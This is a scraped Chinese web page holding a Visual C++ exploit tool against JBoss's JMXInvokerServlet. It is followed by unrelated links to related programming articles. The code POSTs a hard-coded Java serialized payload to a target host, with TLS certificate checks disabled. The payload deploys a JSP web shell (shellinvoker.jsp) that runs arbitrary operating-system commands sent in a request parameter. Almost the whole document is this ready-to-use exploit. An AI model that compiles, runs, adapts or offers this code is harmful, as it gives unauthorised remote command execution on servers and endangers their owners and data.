Jboss remote getshell (JMXInvokerServlet) vc版

#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>
#include <winhttp.h>
#include <comdef.h>
#pragma comment (lib,"Winhttp.lib")

char shell_invoke[] = (
    "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73" ///shellinvoker/shellinvoker.jsp
    "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72"
    "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f"
    "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77"
    "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76"
    "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2"
    "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75"
    "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e"
    "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00"
    "\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62"
    "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d"
    "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc"
    "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6"
    "\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61"
    "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90"
    "\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04"
    "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65"
    "\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f"
    "\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a"
    "\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69"
    "\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c"
    "\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73"
    "\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00"
    "\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61"
    "\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72"
    "\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61"
    "\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e"
    "\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a"
    "\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71"
    "\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65"
    "\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c"
    "\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48"
    "\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e"
    "\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62"
    "\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73"
    "\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65"
    "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28"
    "\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d"
    "\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61"
    "\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69"
    "\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75"
    "\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70"
    "\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72"
    "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72"
    "\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65"
    "\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20"
    "\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28"
    "\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69"
    "\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20"
    "\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67"
    "\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee"
    "\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72"
    "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74"
    "\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00"
    "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61"
    "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00"
    "\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65"
    "\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00"
    "\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69"
    "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61"
    "\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02"
    "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00"
    "\x00\x04\x70\x78");

void request_https(wchar_t* Host,int port)
{
    DWORD dwSize = 0;
    DWORD dwDownloaded = 0;
    LPSTR pszOutBuffer;
    BOOL bResults = FALSE;
    HINTERNET hSession = NULL,
        hConnect = NULL,
        hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen( L"WinHTTP Example/1.0",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS, 0);

    // Specify an HTTP server.
    if (hSession)
        hConnect = WinHttpConnect( hSession,Host,
        port, 0);

    // Create an HTTP request handle.
    if (hConnect)
        hRequest = WinHttpOpenRequest( hConnect, L"POST",L"/invoker/JMXInvokerServlet",
        NULL, WINHTTP_NO_REFERER,
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        WINHTTP_FLAG_SECURE);

    DWORD options = SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
        SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
        SECURITY_FLAG_IGNORE_UNKNOWN_CA ;

    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpAddRequestHeaders( hRequest,
        L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

    bResults = WinHttpSetOption( hRequest, WINHTTP_OPTION_SECURITY_FLAGS ,
        (LPVOID)&options, sizeof (DWORD) );

    if(bResults == FALSE){
        printf("Error in WinHttpQueryOption WINHTTP_OPTION_SECURITY_FLAGS: %ld\n",GetLastError());
    }

    // Send a request.
    if (hRequest){
        bResults = WinHttpSendRequest( hRequest,
            WINHTTP_NO_ADDITIONAL_HEADERS, 0,
            shell_invoke, WORD(sizeof(shell_invoke)),
            sizeof(shell_invoke), 0);
        if(bResults == FALSE)
            printf ("WinHttpSendRequest error: %ld\n",GetLastError());
    }

    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
}

void request_http(wchar_t* Host, int Port)
{
    DWORD dwSize = sizeof(DWORD);
    DWORD dwStatusCode = 0;
    BOOL  bResults = FALSE;
    HINTERNET hSession = NULL,
    hConnect = NULL,
    hRequest = NULL;

    // Use WinHttpOpen to obtain a session handle.
    hSession = WinHttpOpen(L"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.118 Safari/537.36",
        WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
        WINHTTP_NO_PROXY_NAME,
        WINHTTP_NO_PROXY_BYPASS,
        0 );

    // Specify an HTTP server.
    if( hSession )
        hConnect = WinHttpConnect( hSession,
        Host,
        Port,
        0 );

    // Create an HTTP Request handle.
    if( hConnect )
        hRequest = WinHttpOpenRequest( hConnect,
        L"POST",L"/invoker/JMXInvokerServlet",  // /invoker/JMXInvokerServlet
        NULL,
        WINHTTP_NO_REFERER,
        WINHTTP_DEFAULT_ACCEPT_TYPES,
        0 );
    // Add a request header.
    if( hRequest )
        bResults = WinHttpAddRequestHeaders( hRequest,
        L"Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue"
        ,(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );

        bResults = WinHttpAddRequestHeaders( hRequest,
            L"Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2",(ULONG)-1L,WINHTTP_ADDREQ_FLAG_ADD );
    // Send a Request.
    if( bResults )
        bResults = WinHttpSendRequest( hRequest,
        WINHTTP_NO_ADDITIONAL_HEADERS,
        0,
        shell_invoke,WORD(sizeof(shell_invoke)),
        sizeof(shell_invoke),
        0 );

    // Report any errors.
    if( !bResults )
        printf( "Error %d has occurred.\n", GetLastError( ) );

    // Close open handles.
    if( hRequest ) WinHttpCloseHandle( hRequest );
    if( hConnect ) WinHttpCloseHandle( hConnect );
    if( hSession ) WinHttpCloseHandle( hSession );
    //return 0;
}

int main(int argc, char* argv[])
{

    if (argc < 4)
    {
        printf("[*]:%s Jboss Exploit remote getshell\r\n",argv[0]);
        printf("[*]:%s Remote_Host Remote_ip http/https \r\n",argv[0]);
        printf("[*]:Getshell Path:/shellinvoker/shellinvoker.jsp\r\n");
        return -1;
    }
    wchar_t Host[MAX_PATH] = {0};
    wchar_t procotol[MAX_PATH] = {0};
    wsprintfW(Host, L"%S", argv[1]);
    wsprintfW(procotol,L"%S",argv[3]);
    printf("\r\n[*]:Host:%S procotol:%S \r\n", Host,procotol);

    if (0 == lstrcmpi(procotol, L"http"))
    {
        request_http(Host,atoi(argv[2]));

    }else if(0 == lstrcmpi(procotol, L"https"))
    {
        request_https(Host,atoi(argv[2]));
    }else
    {
        printf("\r\nUnknown option.\r\n");
        return 0;
    }
    return 0;
}

时间: 2024-11-08 03:04:17

Jboss remote getshell (JMXInvokerServlet) vc版的相关文章

【141031】VC++版串口调试助手源码

VC++版串口调试助手源码,功能还是比较多的,接收区和来显示串口消息,在调试时,可指定串口.波特率.校验位.数据位.停止位,关闭串口和清空接收区.以十六进制调试.保存显示数据.在同一周期后自动发送数据.选择发送文件.计数器清零等功能,代码在VC++6.0中可直接编译. 源码下载地址:点击下载

VC版超级记事本

这是学习VC时的一个大作业,超级记事本,突然发现了,传上来供大家学习参考! 一.  功能需求: 1. 能在原有像记事本程序的基础上添加更多功能: 1).能够改变背景颜色. 2).能够改变字体颜色. 3).能够改变字体. 4). 能够对段落进行对齐等. 二.  总体设计计: 首先要的申明的是:本程序继承自CRichEditView. 1.添加"格式(O)"菜单项: (1) .添加"字体(F)"子菜单. (2).添加"背景颜色(B)"子菜单. (3)

智能指针(auto_ptr)vc版

auto_ptr包含于头文件 #include<memory> 其中<vector><string>这些库中也存有.auto_ptr 能够方便的管理单个堆内存对象,在你不用的时候自动帮你释放内存. auto_ptr的设计目的: 局部对象获取的资源(内存),当函数退出时,它们的析构函数被调用,从而自动释放这些资源,但是,如果以显式手法获得的资源(称为动态分配内存空间如:new.malloc等)没有绑定在任何对象身上,必须以显式手法释放.(如:delete,free等).

VC版DoEvents

VB和C#下有一个DoEvents方法,可以让程序在执行操作的同时仍可以处理其他事件.由于近期在做一个数据格式转换的项目,需要进行大批量的数据处理,希望能在进行数据读写过程中,程序还能接收其他操作,防止假死现象.百度了一下,发现VB和C#下有此函数,VC下需自己写. void DoEvents() {  MSG msg;  while(PeekMessage(&msg,NULL,0,0,PM_REMOVE))  {  DispatchMessage(&msg);  TranslateMes

ring3下利用WMI监视进程创建(vc版)

[cpp] view plain copy #include "stdafx.h" #define _WIN32_DCOM #include <iostream> using namespace std; #include <comdef.h> #include <Wbemidl.h> # pragma comment(lib, "wbemuuid.lib") int main(int argc, char **argv) { H

SendMessage发送自定义消息及消息响应(VC版)

控件向父窗体发送自定义消息,父窗体定义处理此消息的函数  程序源代码(整个工程)下载:http://download.csdn.net/detail/qq2399431200/6274793 效果描述: 指定哪个类添加自定义消息:(当然这个类必须是CmdTarget的子类,不然不能处理消息) 添加消息 实现消息函数:(wParam和lParam程序员可以自行设计传什么值) SendMessage参数解析(SendMessageA是单字节类型函数,SendMessageW是双字节) 1:接受此消息

VC版八皇后

一.  功能需求: 1. 可以让玩家摆棋,并让电脑推断是否正确 2. 能让电脑给予帮助(给出全部可能结果) 3. 实现悔棋功能 4. 实现重置功能 5. 加入点按键音效果更佳 二.  整体设计计: 1.   核心算法: 递归实现(回溯算法): 思路:按行分别安排皇后(Q),Q数目眼下为8. Q1从第一行第一列開始到最后一列,先放在第一列: Q2从第二行第一列到最后一列,每次都检查冲突,不冲突才干够落子: 依次尝试Qm- 假设Qm没有可摆放的位置,则返回Qm-1,同一时候Qm-1放弃刚才的位置:

JBOSS安全配置

JBOSS安全配置 概念: JBoss应用服务器(JBoss AS)是一个被广泛使用的开源Java应用服务器. 它是JBoss企业中间件(JEMS)的一部分,并且经常在大型企业中使用. 架构 JBoss的模块架构是建立在JMX底层上的.JMX是一个可复用框架,它为远程(Remote)和本地(Local)管理工具扩展了应用.它的架构是层式架构.他们是实现层(instrumentation layer).代理层(agent layer)和发布层(distribution layer).用户使用管理B

Qt版贪吃蛇游戏

Qt版贪吃蛇游戏 转载请标明出处:牟尼的专栏 http://blog.csdn.net/u012027907 最近在学习Qt,用了一个多月的时间掌握了Qt中最基本的知识,也完成了<Qt版音乐播放器>.<Qt版贪吃蛇游戏>.<Qt版双人俄罗斯方块>以及<Qt版科学计算器>等,之前在VC下写过这些程序,所以在Qt下只是改变了显示等语句,我写过<C++版贪吃蛇游戏>.<VC版贪吃蛇游戏>,当时将与显示等无关的东西封装起来,在Qt下直接用,只